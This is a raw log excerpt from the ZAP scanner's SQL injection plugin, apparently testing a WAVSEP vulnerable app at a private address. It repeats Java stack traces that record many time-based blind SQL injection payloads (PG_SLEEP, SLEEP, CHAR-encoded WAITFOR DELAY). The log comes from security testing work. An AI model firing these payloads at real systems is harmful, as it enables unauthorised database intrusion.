org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681319 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 6548=(SELECT 6548 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 6548=(SELECT 6548 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681320 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT * FROM (SELECT(SLEEP(5)))Jbew) AND (9546=9546] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND (SELECT * FROM (SELECT(SLEEP(5)))Jbew) AND (9546=9546 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681321 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 9454=(SELECT 9454 FROM PG_SLEEP(5))-- goQR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 9454=(SELECT 9454 FROM PG_SLEEP(5))-- goQR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681322 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))TXfw)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))TXfw) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681322 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (5313=5313] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (5313=5313 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681323 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681324 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT * FROM (SELECT(SLEEP(5)))jZcy) AND ('CnDE'='CnDE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND (SELECT * FROM (SELECT(SLEEP(5)))jZcy) AND ('CnDE'='CnDE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681324 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('rAvt'='rAvt] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('rAvt'='rAvt at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681325 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT * FROM (SELECT(SLEEP(5)))CvQZ) AND 'UJPN'='UJPN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND (SELECT * FROM (SELECT(SLEEP(5)))CvQZ) AND 'UJPN'='UJPN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681325 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'uZtb'='uZtb] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'uZtb'='uZtb at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681326 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT * FROM (SELECT(SLEEP(5)))dKWx) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND (SELECT * FROM (SELECT(SLEEP(5)))dKWx) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681327 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681328 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- lpDA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- lpDA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681328 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * FROM (SELECT(SLEEP(5)))CQrQ)-- Kdne] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND (SELECT * 